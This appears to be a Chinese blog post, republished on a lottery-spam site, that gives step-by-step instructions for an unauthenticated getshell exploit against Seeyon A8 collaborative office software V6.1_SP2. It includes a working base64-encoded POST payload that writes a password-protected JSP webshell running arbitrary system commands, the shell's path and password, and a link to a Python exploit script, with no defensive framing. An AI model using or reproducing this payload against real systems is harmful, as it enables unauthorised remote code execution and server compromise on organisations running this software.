网上彩票购买

码迷,bjsfhd.cn
网上彩票购买 > 系统相关 > 详细

致远A8协同管理软件无需登录getshell漏洞

时间:2019-06-28 21:13:31      阅读:48      评论:0      收藏:0      [点我收藏+]

标签:div   hdp   webshell   offic   script   esb   ica   ima   asa   

测试环境:致远A8-V5协同管理软件 V6.1_SP2_2018-03-27_2653852748

第1步:访问/seeyon/htmlofficeservlet
如果出现下图所示的内容,表示存在漏洞。

技术图片

第2步:构造PoC
把下面的PoC经base64解码即就是POST数据包内容:
REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=

 

技术图片


第3步:访问webshell
webshell地址为/seeyon/test123456.jsp,密码为:asasd3344。

技术图片


感谢大佬提供的Python脚本,参考链接:

https://github。com/nian-hua/CVEScript/blob/master/%E8%87%B4%E8%BF%9COA/zhiyuan。py

致远A8协同管理软件无需登录getshell漏洞

标签:div   hdp   webshell   offic   script   esb   ica   ima   asa   

原文地址:https://www.cnblogs.com/dgjnszf/p/11104594.html

(0)
(0)
   
举报
评论 一句话评论(0
0条  
登录后才能评论!
           
© 2014 bjsfhd.cn 版权所有 京ICP备13008772号-2
迷上了代码!
手机彩票app 秒速彩票投注 彩票购买 彩票开奖查询 彩票购买走势 手机彩票app 手机彩票app 彩票开奖查询 彩票开奖结果 彩票开奖查询